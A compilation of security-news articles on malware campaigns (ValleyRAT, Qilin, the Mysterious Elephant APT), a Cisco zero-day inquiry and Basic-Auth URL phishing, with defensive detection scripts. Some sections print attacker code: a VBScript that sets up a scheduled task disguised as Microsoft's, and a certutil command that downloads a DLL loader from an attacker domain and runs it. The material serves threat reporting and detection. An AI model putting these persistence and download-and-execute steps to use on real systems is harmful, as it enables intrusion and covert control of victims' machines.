An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure has led to the discovery of a new GNU/Linux rootkit dubbed LinkPro, according to findings from Synacktiv. “This backdoor features functionalities relying on the installation of two eBPF [extended Berkeley Packet Filter] modules, on the one hand to conceal itself, and on the other hand to be remotely
Over the past month, a targeted campaign dubbed Operation Silk Lure has surfaced, exploiting the Windows Task Scheduler to deploy a novel variant of ValleyRAT.
Emerging in mid-2025, the operation hinges on spear-phishing emails that carry malicious LNK attachments masquerading as candidate resumes.
When victims open these attachments, a hidden PowerShell command initiates the download of a decoy document and two executables: a loader (keytool.exe) and its side-loaded DLL (jli.dll).
Initial analysis reveals that the phishing lure is crafted for Chinese fintech and trading firms’ HR departments.
The malicious LNK file contains an obfuscated PowerShell one-liner, which silently retrieves payloads from a command-and-control (C2) server hosted in the United States.
Once executed, the dropper writes a VBScript named CreateHiddenTask.vbs into the user’s AppData folder, then runs it to establish persistence.
Seqrite researchers noted that this script programmatically registers a daily scheduled task named “Security,” spoofing Microsoft Corporation as the author, and immediately deletes itself to hinder detection.
Following the persistence step, the loader binary (keytool.exe) launches and uses DLL side-loading to execute jli.dll.
This DLL locates an 8-byte marker in its own file, extracts the subsequent encrypted payload, and performs RC4 decryption with a hard-coded key.
Infection chain (Source – Seqrite)
The decrypted shellcode is injected directly into memory, establishing contact with the C2 server at 206.119.175.16 and beginning reconnaissance and exfiltration.
Seqrite researchers noted that once inside, ValleyRAT engages in extensive data harvesting and defense-evasion maneuvers.
It fingerprints the host—collecting CPU details, screen resolution, and NIC information—while checking for virtualization or known antivirus products via WMI queries.
Detected security services, including 360Safe and Kingsoft, have their network connections forcefully terminated. All activities are logged and transmitted covertly over HTTPS, raising the risk of credential theft and corporate espionage.
Infection Mechanism and Persistence
A closer look at the infection chain uncovers the elegance of its persistence tactic. The VBScript used to register the scheduled task leverages COM interfaces to interact with the Task Scheduler.
Below is the core snippet from CreateHiddenTask.vbs:

    Set service = CreateObject("Schedule.Service")
    service.Connect
    Set rootFolder = service.GetFolder("\")
    Set taskDef = service.NewTask(0)
    With taskDef.RegistrationInfo
        .Author = "Microsoft Corporation"
    End With
    With taskDef.Triggers.Create(1) ' DAILY trigger
        .StartBoundary = "2025-08-01T08:00:01"
        .DaysInterval = 1
    End With
    With taskDef.Actions.Create(0) ' EXEC action
        .Path = ExpandEnvironmentStrings("%APPDATA%\keytool.exe")
    End With
    rootFolder.RegisterTaskDefinition "Security", taskDef, 6, "", "", 3

Upon registration, the task executes keytool.exe every morning at 8:00 AM. This mechanism ensures the loader runs consistently, even after system reboots.
By embedding author metadata and deleting the script, the threat actors blend into normal system activity, complicating forensic investigations.
The combination of LNK-based initial compromise, VBScript persistence, and DLL side-loading makes Operation Silk Lure a sophisticated threat demanding updated hunting signatures and vigilant monitoring of scheduled tasks.
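A defender-side hunt for the persistence pattern just described, written as an added example for this page (not Seqrite's or the campaign's code): it parses Task Scheduler XML definitions and flags tasks that claim Microsoft authorship while launching from a user-writable path. The task XML samples, the user name and the allow-list entry are constructed assumptions.

```python
r"""Hunt Windows Task Scheduler definitions for the Silk Lure persistence pattern.

Task definitions live as XML under C:\Windows\System32\Tasks (UTF-16 with a BOM:
read each file as bytes and pass the bytes to ET.fromstring). A task whose Author
claims "Microsoft Corporation" while its Exec action runs from a user-writable
profile path is a strong hunting lead. All task XML below is constructed.
"""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments a genuine Microsoft-authored task has no reason to launch from.
USER_WRITABLE_HINTS = ("%appdata%", "%localappdata%", "%temp%", "%tmp%",
                       "\\appdata\\", "\\users\\public\\", "\\programdata\\")
# Known legitimate exception: OneDrive's updater is Microsoft-authored and runs
# from %LOCALAPPDATA%. Extend this from your own baseline before deploying.
ALLOWLIST = ("\\microsoft\\onedrive\\",)


def analyse_task(xml_text):
    """Return (author, commands, reasons); a non-empty reasons list means triage it."""
    root = ET.fromstring(xml_text)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS).strip()
    commands = [(c.text or "").strip()
                for c in root.findall(".//t:Actions/t:Exec/t:Command", NS)]
    claims_microsoft = "microsoft" in author.lower()
    reasons = []
    for cmd in commands:
        low = cmd.lower()
        if any(ok in low for ok in ALLOWLIST):
            continue
        if any(hint in low for hint in USER_WRITABLE_HINTS):
            reasons.append("Exec action runs from a user-writable path: " + cmd)
            if claims_microsoft:
                reasons.append("author claims Microsoft Corporation for a profile-path binary")
    return author, commands, reasons


def hunt(tasks):
    """tasks: {task_name: xml_text}. Returns the task names that need triage."""
    return [name for name, xml in tasks.items() if analyse_task(xml)[2]]


# Constructed: the task CreateHiddenTask.vbs registers (daily at 08:00, %APPDATA% loader).
SILK_LURE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-08-01T08:00:01</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\Users\hr-user\AppData\Roaming\keytool.exe</Command></Exec></Actions>
</Task>"""

# Constructed: a benign Microsoft task launching from the system directory.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Actions><Exec><Command>%SystemRoot%\System32\sc.exe</Command>
    <Arguments>start w32time task_started</Arguments></Exec></Actions>
</Task>"""

# Constructed: Microsoft-authored OneDrive updater under %LOCALAPPDATA%, allow-listed.
ONEDRIVE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Actions><Exec><Command>%LOCALAPPDATA%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    tasks = {"Security": SILK_LURE_TASK, "SynchronizeTime": BENIGN_TASK, "OneDrive Updater": ONEDRIVE_TASK}
    for name in hunt(tasks):
        print(name, "->", analyse_task(tasks[name])[2])
```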
The post Operation Silk Lure Weaponizing Windows Scheduled Tasks to Drop ValleyRAT appeared first on Cyber Security News.
The Qilin ransomware group has emerged as one of the most prolific and dangerous threat actors in the cybersecurity landscape, exploiting sophisticated bulletproof hosting infrastructure to conduct devastating attacks on organizations across multiple sectors.
Operating under a Ransomware-as-a-Service (RaaS) model, Qilin first surfaced in mid-2022 under the name “Agenda” before rebranding later that year.
The group has gained widespread notoriety for targeting healthcare organizations, government entities, critical infrastructure operators, and asset management firms worldwide.
Most notably, the gang recently claimed responsibility for the September 2025 ransomware attack that crippled operations at Asahi Group Holdings, Japan’s largest beverage manufacturer, forcing production shutdowns at most of its 30 factories for nearly two weeks.
The ransomware operation maintains variants written in both Golang and Rust programming languages, demonstrating technical versatility that enables cross-platform attacks.
According to the Health Sector Cybersecurity Coordination Center, Qilin gains initial access through spear phishing campaigns and leverages Remote Monitoring and Management (RMM) tools alongside other common penetration tools to establish persistence within compromised networks.
Qilin blog (Source – Resecurity)
The group practices double extortion tactics, encrypting victim data while simultaneously exfiltrating sensitive information to pressure organizations into paying ransoms.
Their RaaS platform provides affiliates with user-friendly panels to configure attacks, manage victims, and negotiate ransoms, while maintaining a Data Leak Site on the Tor network for publishing stolen data.
Resecurity analysts noted that Qilin’s operations are deeply intertwined with an underground bulletproof hosting conglomerate that has origins in Russian-speaking cybercriminal forums and Hong Kong.
The threat actors have established strong connections to rogue hosting providers that enable them to operate with minimal oversight and maximum resilience against law enforcement intervention.
These bulletproof hosting services are incorporated in pro-secrecy jurisdictions and structured across complex webs of anonymous shell companies distributed geographically, creating safe havens for cybercriminals who wish to remain anonymous.
The group’s infrastructure relies heavily on providers such as Cat Technologies Co. Limited, a Hong Kong-based entity that shares business addresses with related companies including Starcrecium Limited in Cyprus and Chang Way Technologies Co. Limited.
Resecurity researchers identified that these entities serve as official representatives for Russia-based hosting provider Hostway.ru, which operates under the legal entity OOO “Information Technologies”.
Network analysis revealed that Qilin ransomware operations utilize IP addresses associated with these providers, with frequent changes to complicate tracking efforts.
In April 2024, researchers observed the group’s Data Leak Site mentioning IP addresses 176[.]113[.]115[.]97 and 176[.]113[.]115[.]209, both associated with Cat Technologies Co. Limited.
The business model of these bulletproof hosting providers thrives on zero Know Your Customer (KYC) protocols and complete absence of due-diligence checks.
They offer services ranging from $95 to $500 and beyond, depending on server configurations, with specialized offerings for mass scanning capabilities featuring network bandwidth up to 10 Gbps. One prominent provider, BEARHOST Servers—also known as Underground and Voodoo Servers—has been advertising directly on Qilin’s “WikiLeaksV2” platform.
Historical passive DNS records show this operation was hosted at IP 31[.]41[.]244[.]100 associated with Red Bytes LLC in Saint Petersburg, Russia.
The service has maintained active accounts on multiple underground forums including XSS and Exploit since at least 2019.
Bulletproof Hosting Infrastructure and Operational Resilience
The bulletproof hosting infrastructure supporting Qilin ransomware operations demonstrates remarkable resilience through sophisticated corporate structures designed to evade detection and law enforcement action.
Multiple legal entities share common directors and addresses, creating a complex web that shields the true operators from accountability.
Corporate records reveal that Mr. Lenar Davletshin serves as director of numerous entities including Chang Way Technologies Co. Limited, Starcrecium Limited, OOO “Red Byte,” OOO “Information Technologies,” OOO “Hostway,” OOO “Hostway Rus,” OOO “Triostars,” and OOO “F1”—all registered in Russia, Cyprus, and Hong Kong.
These hosting networks are frequently implicated in command-and-control server operations for various malware families including Amadey, StealC, and CobaltStrike.
The IP address 85.209.11.79, associated with this infrastructure, has been reported over 11,346 times to AbuseIPDB for malicious activity including exploit probing and network scanning.
The interconnected nature of these providers was further confirmed when U.S. Treasury Department sanctions in July 2025 targeted the Aeza Group for providing bulletproof hosting services to cybercriminals, specifically aiding ransomware groups like BianLian and hosting illicit drug markets such as BlackSprut.
Following increased scrutiny and multiple abuse complaints, BEARHOST announced in late December 2024 that their service would transition to private mode, accepting new customers only through vetting and invitations from existing clients.
This operational security adjustment represents a common pattern among established underground vendors who have built significant customer bases and seek to minimize exposure to law enforcement and cybersecurity researchers.
In May 2025, BEARHOST rebranded as “voodoo_servers” before ultimately announcing termination of services due to “political reasons,” executing what appears to be an exit scam that left customers without server access or fund returns while the underlying legal entities continued operations.
The post Qilin Ransomware Using Ghost Bulletproof Hosting to Attack Organizations Worldwide appeared first on Cyber Security News.
In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.
First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.
Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.
Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.
Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.
As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.
Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.
Mysterious Elephant spear phishing email (Source – Securelist)
These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.
By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.
    # Download and execute BabShell payload
    certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
    rundll32.exe BabShell.dll,EntryPoint

Infection Mechanism
The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.
When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.
This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.
Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.
After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.
This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.
By avoiding disk writes, MemLoader HidenDesk significantly reduces the forensic evidence left on the host, allowing Mysterious Elephant to move laterally and harvest target data undetected.
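As an added example (not Securelist's code), detection logic for the chain above run over constructed process-creation events: a hidden no-profile PowerShell, certutil used as a downloader, and rundll32 executing the DLL certutil just fetched. The event fields, PIDs, paths and the lure.example host are assumptions.

```python
"""Detection logic for the BabShell delivery chain described above, run over
constructed process-creation events in the shape Sysmon Event ID 1 or an EDR
provides (pid, parent pid, image, command line). It flags a hidden no-profile
PowerShell, certutil -urlcache used as a downloader, and a rundll32 invocation
of the DLL certutil just wrote. Events, paths and the URL are constructed for
this example; "lure.example" stands in for the real C2 host.
"""
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
DLL_RE = re.compile(r"([\w.\-\\:]+\.dll)\s*,\s*(\w+)", re.I)   # rundll32 <dll>,<export>
HIDDEN_PS = re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyse_events(events):
    """events: list of dicts with pid, ppid, image, cmdline. Returns [(pid, finding)]."""
    findings = []
    downloaded = {}    # basename written by certutil -> pid of that certutil
    for ev in events:
        image, cmd = ev["image"].lower(), ev["cmdline"]
        low = cmd.lower()
        if image.endswith("powershell.exe") and HIDDEN_PS.search(cmd) and "-nop" in low:
            findings.append((ev["pid"], "hidden PowerShell started with -nop -w hidden"))
        elif image.endswith("certutil.exe") and "urlcache" in low and URL_RE.search(cmd):
            # certutil -urlcache [-split] -f <url> <outfile>: the last token is the file written
            downloaded[basename(cmd.split()[-1])] = ev["pid"]
            findings.append((ev["pid"], "certutil used as downloader: " + URL_RE.search(cmd).group(0)))
        elif image.endswith("rundll32.exe"):
            match = DLL_RE.search(cmd)
            if not match:
                continue
            dll, export = match.group(1), match.group(2)
            if basename(dll) in downloaded:
                findings.append((ev["pid"], f"rundll32 runs {dll},{export} fetched by certutil pid "
                                             f"{downloaded[basename(dll)]}"))
            elif not any(d in dll.lower() for d in SYSTEM_DIRS):
                findings.append((ev["pid"], f"rundll32 loads non-system DLL {dll},{export}"))
    return findings


# Constructed process-creation events mirroring the chain in the article.
EVENTS = [
    {"pid": 4101, "ppid": 3980, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 4120, "ppid": 4101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -File C:\Users\hr-user\AppData\Local\Temp\stage1.ps1"},
    {"pid": 4133, "ppid": 4120, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -urlcache -f "http://lure.example/BabShell.dll" BabShell.dll'},
    {"pid": 4140, "ppid": 4120, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe BabShell.dll,EntryPoint"},
    {"pid": 2210, "ppid": 900, "image": r"C:\Windows\System32\rundll32.exe",   # benign control-panel call
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, finding in analyse_events(EVENTS):
        print(pid, finding)
```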
The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.
Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.
The post Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information appeared first on Cyber Security News.
U.S. Senator Bill Cassidy, Chairman of the Senate Health, Education, Labor, and Pensions (HELP) Committee, has demanded answers from Cisco Systems regarding recent zero-day vulnerabilities in its widely used networking equipment.
The October 10, 2025, letter to CEO Chuck Robbins highlights the potential risks to national security and the economy, following a swift emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA).

With cybercrimes costing Americans over $16 billion in 2024 alone, according to FBI estimates, the incident amplifies fears of widespread exploitation by state-sponsored actors from nations like China, Russia, and Iran.
Cisco 0-Day Firewall Vulnerabilities
The vulnerabilities, identified as CVE-2025-20333 and CVE-2025-20362, affect Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices, enabling unauthenticated remote code execution and privilege escalation.
These flaws, exploited in a campaign linked to the ArcaneDoor threat actor since at least early 2024, allow attackers to implant persistent malware that survives reboots and upgrades by manipulating read-only memory (ROM).
CISA’s Emergency Directive 25-03, issued on September 25, 2025, mandated federal agencies to inventory all affected devices, conduct forensic analysis via core dumps, and apply patches within 24 hours or disconnect end-of-life hardware entirely.
Reports indicate at least one federal agency suffered a breach, prompting urgent containment measures and submissions to CISA’s malware portal by September 26.
Cassidy’s letter emphasizes Cisco’s pivotal role as the world’s largest network infrastructure provider, serving federal entities and countless businesses that rely on its tools for essential services like healthcare access and education platforms.
He warns that unaddressed flaws could disrupt operations for millions, particularly in vulnerable sectors without dedicated cybersecurity leadership; 45% of U.S. companies lack a Chief Information Security Officer.
The senator seeks details on whether Cisco has pinpointed threats to private customers and how it’s disseminating patches or advisories.
Further questions probe proactive communications, recommendations for upgrading outdated devices akin to CISA’s federal mandates, and targeted support for agencies like Health and Human Services, Education, and Labor.
As Cisco collaborates with federal responders, having acknowledged exploitation dating back to May 2025, the focus shifts to broader protections for non-federal users.
Small businesses, schools, and healthcare providers face heightened risks, given the devices’ ubiquity in securing remote access and VPNs.
Cassidy requires responses by October 27, 2025, to inform ongoing HELP Committee investigations into cyber defenses. Experts urge all organizations to review Cisco advisories and implement mitigations promptly to avert similar crises.
The post Senate Investigates Cisco Over Zero-Day Firewall Vulnerabilities appeared first on Cyber Security News.
Early October 2025 witnessed the resurgence of a retro phishing technique that exploits legacy Basic Authentication URLs to deceive users into divulging sensitive credentials.
Threat actors crafted links in the format https://username:password@domain.com, embedding a trusted institution’s domain in the username field to visually mimic legitimate services.
When users click these links, their browsers authenticate to the malicious domain specified after the @ symbol, silently harvesting the credentials intended for the forged site.
This tactic is particularly effective in mobile apps and email clients that truncate long URLs, showing only the deceptive portion before the @ symbol.
Netcraft analysts noted the first wave of these attacks targeting GMO Aozora Bank customers in Japan, where the attackers registered URLs such as hxxps://gmo-aozora.com%25TOKEN@coylums.com/sKgdiq.
Victims encountering these links in phishing emails were prompted to complete a Japanese-language CAPTCHA page designed to simulate a legitimate security check.
CAPTCHA page captured before URLs became inactive (Source – Netcraft)
Despite modern browsers supporting Basic Auth URLs, this format has fallen out of favor due to security concerns, making it an unexpected vector that evades casual URL scrutiny.
Following the initial discovery, Netcraft researchers identified more than 200 unique Basic Auth phishing URLs in a two-week period.
Attacks impersonated major brands including Amazon, Google, and Netflix, often cloaking malicious domains behind familiar names.
One example spoofed Netflix, luring recipients into clicking a link that seemed legitimate but directed them to a credential-stealing script hosted on themiran.net.
The coordinated use of multiple malicious domains and encoded tokens strengthened the illusion of legitimate authentication flows.
Beyond simple credential harvesting, these phishing links also implemented human verification CAPTCHAs to delay automated takedown efforts and to reinforce trust among victims.
The CAPTCHA page emulated a security checkpoint, requiring users to click “I am not a robot” before proceeding to a counterfeit login form. This extra step both increased the perceived legitimacy of the page and gave attackers additional time to capture credentials.
Infection Mechanism and Credential Exfiltration
Upon clicking a compromised Basic Auth URL, the victim’s browser issues an HTTP GET request with the credentials field set to the trusted domain text.
For example:

    GET /sKgdiq HTTP/1.1
    Host: coylums.com
    Authorization: Basic Z21vLWFvem9yYS5jb206

Here, Z21vLWFvem9yYS5jb206 is the Base64-encoded representation of the string gmo-aozora.com: (the embedded “username”, a colon, and an empty password). The server decodes this header to confirm the presence of the embedded “username,” then serves the phishing page that mimics the bank’s login interface.
Submitted credentials are sent via a POST request to the attacker’s backend endpoint, where they are collected for later misuse.
This mechanism bypasses typical URL filters that focus on query strings rather than embedded authentication tokens.
By reviving this outdated HTTP feature, attackers have demonstrated how legacy standards can be repurposed for modern phishing campaigns.
Financial institutions and security teams should update URL inspection rules to detect and block Basic Authentication tokens in links and educate users about the dangers of unbeknownst embedded credentials.
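The URL-inspection rule the article calls for, as an added example not taken from Netcraft: it separates the decoy domain in the userinfo from the real host and round-trips the Basic header shown above. The Netflix and intranet.example URLs are constructed; the GMO Aozora link and header are the ones quoted in the article.

```python
"""URL-inspection logic for the Basic-Auth phishing pattern described above: a
trusted brand's domain is placed in the userinfo (before '@') so that a
truncated display hides the real host after it. Also shows the Authorization
header such a request carries. The GMO Aozora URL and header are the ones
quoted in the article; the Netflix and intranet.example URLs are constructed.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

DOMAIN_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+")


def inspect_url(url):
    """Return real host, the decoy shown before '@', and whether to block the link."""
    parts = urlsplit(url.replace("hxxp", "http", 1))      # accept defanged URLs
    userinfo = parts.netloc.rpartition("@")[0]            # '' when there is no '@'
    username = unquote(userinfo.split(":", 1)[0])         # drop any password part
    decoy = DOMAIN_RE.match(username.lower())
    decoy = decoy.group(0) if decoy else ""
    real_host = (parts.hostname or "").lower()
    # Suspicious when the userinfo reads like a domain and does not match the real host.
    suspicious = bool(decoy) and real_host != decoy and not real_host.endswith("." + decoy)
    return {"real_host": real_host, "userinfo": userinfo, "decoy": decoy, "suspicious": suspicious}


def encode_basic(username, password=""):
    """Authorization header value a client builds from URL credentials."""
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def decode_basic(header_value):
    """Inverse of encode_basic, as the phishing server does to read the decoy."""
    token = header_value.split(" ", 1)[1]
    token += "=" * (-len(token) % 4)                      # restore '=' padding lost in transit or logs
    user, _, pw = base64.b64decode(token).decode("utf-8").partition(":")
    return user, pw


# Sample links: the first is from the article (defanged), the rest are constructed.
SAMPLES = [
    "hxxps://gmo-aozora.com%25TOKEN@coylums.com/sKgdiq",
    "hxxps://netflix.com@themiran.net/login",
    "https://www.netflix.com/login",
    "https://user:secret@intranet.example/",
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(inspect_url(link))
    print(encode_basic("gmo-aozora.com"))                  # Basic Z21vLWFvem9yYS5jb206
    print(decode_basic("Basic Z21vLWFvem9yYS5jb206"))       # ('gmo-aozora.com', '')
```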
The post New Phishing Attack Uses Basic Auth URLs to Trick Users and Steal Login Credentials appeared first on Cyber Security News.
A new phishing campaign impersonating LastPass is circulating today, October 13, 2025, aiming to deceive users into downloading malicious desktop software. Emails purporting to come from “hello@lastpasspulse.blog” or “hello@lastpassgazette.blog” carry the alarming subject line “We Have Been Hacked – Update Your LastPass Desktop App to Maintain Vault Security.” In reality, LastPass has not been compromised; […]
The post Phishing Alert: Fake ‘LastPass Hack’ Emails Spreading Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
A targeted cyber-espionage campaign exploiting Windows Scheduled Tasks and DLL side-loading to deploy the sophisticated ValleyRAT backdoor. The operation pivots on tailored spear-phishing emails, weaponized Windows shortcuts, and a persistent task scheduler mechanism, all delivering a multi-stage malware payload designed to harvest sensitive intelligence from Chinese FinTech and cryptocurrency firms. Adversaries behind Operation Silk Lure […]
The post Operation Silk Lure: Weaponizing Windows Scheduled Tasks for ValleyRAT Delivery appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding an actively exploited vulnerability in Microsoft Windows. The flaw resides in the Windows Remote Access Connection Manager component, which handles remote network connections. By exploiting this weakness, an authorized attacker could elevate privileges and gain full control of an affected system. CVE […]
The post CISA Alerts on Actively Exploited Windows Improper Access Control Flaw appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.